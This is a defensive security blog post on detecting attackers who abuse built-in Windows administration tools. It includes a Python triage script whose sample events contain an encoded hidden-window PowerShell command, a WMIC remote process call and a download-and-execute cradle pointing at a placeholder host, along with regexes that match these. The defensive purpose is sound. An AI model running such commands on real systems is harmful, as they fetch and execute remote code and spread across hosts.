In many data breaches, your IT team, or someone else with the right privileges, has effectively been co-opted.
By the time an attacker is lifting data from your servers, they are no longer hacking in any meaningful sense; they are simply using stolen user credentials and passwords. And in many of those cases, the way they move through your environment is not with custom tools but with the administrative features built into any Windows or Linux system. At this stage it is difficult for traditional, malware-centric threat detection tools to spot them.
This pattern was behind many of the high-profile breaches last year, and behind attacks going back decades: use whatever tools are needed to get a foothold in the environment, gain higher privileges with post-exploitation tooling, and then take advantage of all the built-in operating system functionality to move on to other systems, pull data from file servers, and so on. That functionality is exposed through many built-in command-line utilities and through the same APIs your custom code uses.
It is nothing new that people rely on standard administrative and super-user capabilities to move between systems. We saw plenty of this in the 90s, and while some of the underlying administrative protocols and commands have changed, we saw many examples of it in 2014. Some of the technology has evolved to be more powerful, such as what Microsoft now provides in PowerShell on its modern operating systems, and in watching PowerShell's evolution into a post-exploitation tool we can see history repeating itself as a whole new generation leverages built-in OS administrative APIs after the initial compromise.
Most IT security teams are so focused on threat detection from a malware perspective that they have done little to build the monitoring, system configuration and architecture needed to detect the abuse of administrative functionality within their environment. Now that we are in the era of 'assume breach', we must recognise that such abuse is a common pattern and one we must get better at detecting as early in the attack cycle as possible.
There is, of course, no single way to detect such patterns of usage within your environment; what is needed is a combination of changes to configuration and to your overall system and network architecture. Your organization might already have some of the right configuration and architecture in place, and be lacking mainly in bringing those administrative views of the world into the centralized monitoring systems you already have.
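To make that concrete, here is an added example (my own, not code from the original post or from any vendor guide) of the kind of triage logic that would sit in a centralized monitoring system once Windows Security and PowerShell events are being forwarded to it. It runs over a handful of constructed event records and flags three signs of built-in-tooling abuse discussed above: a privileged account logging on over the network from a host that is not a designated admin jump host, PowerShell launched with a hidden or encoded command line, and remote-execution use of built-in admin utilities such as WMIC. The account names, IP addresses, host names and the jump-host allowlist are all assumptions for the sake of the example; the event IDs (4624 logon, 4688 process creation, 4104 PowerShell script block) are the real Windows ones.

```python
import re

# Assumed environment knowledge (hypothetical names): which accounts are
# privileged and which source addresses are sanctioned admin jump hosts.
PRIVILEGED_ACCOUNTS = {"da-jsmith", "svc-helpdesk"}
ADMIN_JUMP_HOSTS = {"10.0.5.10"}

# PowerShell features that almost never appear in legitimate administration:
# encoded commands, hidden windows, download cradles, Invoke-Expression.
PS_SUSPICIOUS = re.compile(
    r"(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|"
    r"\biex\b|invoke-expression|frombase64string)",
    re.IGNORECASE,
)

# Built-in admin tools invoked against a remote target: WMI, scheduled
# tasks, the service controller, net use against a UNC path.
REMOTE_ADMIN_TOOLS = re.compile(
    r"(\bwmic(\.exe)?\s+/node:|\bschtasks(\.exe)?\s+/s\s|"
    r"\bsc(\.exe)?\s+\\\\|\bnet(\.exe)?\s+use\s+\\\\)",
    re.IGNORECASE,
)

# Constructed sample events, in the shape of already-parsed Windows event
# records. Hosts, users and addresses are made up for the example.
SAMPLE_EVENTS = [
    # Helpdesk admin reaching a file server from the jump host: expected.
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3,
     "TargetUserName": "svc-helpdesk", "IpAddress": "10.0.5.10"},
    # Domain admin network logon from an ordinary workstation: not expected.
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3,
     "TargetUserName": "da-jsmith", "IpAddress": "10.0.22.143"},
    # Ordinary console logon by a normal user.
    {"EventID": 4624, "Computer": "WS22-143", "LogonType": 2,
     "TargetUserName": "jsmith", "IpAddress": "-"},
    # Benign process creation.
    {"EventID": 4688, "Computer": "WS22-143", "SubjectUserName": "jsmith",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    # PowerShell with hidden window and encoded command (base64 truncated).
    {"EventID": 4688, "Computer": "WS22-143", "SubjectUserName": "jsmith",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4A"},
    # Built-in WMI client used to run a command on another host.
    {"EventID": 4688, "Computer": "WS22-143", "SubjectUserName": "da-jsmith",
     "NewProcessName": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic /node:FS02 process call create "cmd.exe /c whoami"'},
    # Script block logging catches the decoded content of a download cradle.
    {"EventID": 4104, "Computer": "WS22-143",
     "ScriptBlockText": "IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://example.invalid/s.ps1')"},
]


def triage(events, privileged=PRIVILEGED_ACCOUNTS, jump_hosts=ADMIN_JUMP_HOSTS):
    """Return (EventID, rule, detail) tuples for events worth an analyst's time."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4624:
            # Network (type 3) logon by a privileged account from a source
            # that is not one of the sanctioned admin jump hosts.
            if (ev.get("LogonType") == 3
                    and ev["TargetUserName"].lower() in privileged
                    and ev.get("IpAddress") not in jump_hosts):
                findings.append((eid, "privileged-logon-from-unexpected-host",
                                 f"{ev['TargetUserName']} -> {ev['Computer']} "
                                 f"from {ev['IpAddress']}"))
        elif eid == 4688:
            cmd = ev.get("CommandLine", "")
            who = f"{ev['SubjectUserName']} on {ev['Computer']}"
            if (ev["NewProcessName"].lower().endswith("powershell.exe")
                    and PS_SUSPICIOUS.search(cmd)):
                findings.append((eid, "suspicious-powershell-invocation", f"{who}: {cmd}"))
            if REMOTE_ADMIN_TOOLS.search(cmd):
                findings.append((eid, "remote-admin-tool-use", f"{who}: {cmd}"))
        elif eid == 4104 and PS_SUSPICIOUS.search(ev.get("ScriptBlockText", "")):
            findings.append((eid, "suspicious-script-block",
                             f"{ev['Computer']}: {ev['ScriptBlockText']}"))
    return findings


def rules_fired(events, **kw):
    """Just the rule names, in event order; handy for tests and dashboards."""
    return [rule for _, rule, _ in triage(events, **kw)]


if __name__ == "__main__":
    for eid, rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{eid}] {rule}: {detail}")
```

Two caveats a practitioner will hit immediately: 4688 only carries the command line if the "Include command line in process creation events" policy is enabled, and 4104 only exists once PowerShell script block logging is turned on (PowerShell 5 and later), so the collection side has to be in place before any of this logic has something to look at. The allowlist of jump hosts is the part that makes the first rule useful; without an architecture that funnels privileged logons through known hosts, a domain admin logging on from a workstation is just Tuesday.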
While there is no single guide to implementing this in your environment, I have included links to a few useful best-practice guides on better managing and monitoring system and administrative functionality.
- NSA IA – Spotting the Adversary with Windows Event Log Monitoring
- Microsoft – Best Practices for Securing Active Directory
- NSA IA – Reducing the Effectiveness of Pass-the-Hash
None of them is a silver bullet, but hopefully this article and a read through these guides will get your IT security team brainstorming about how to tackle this challenge in your own environment.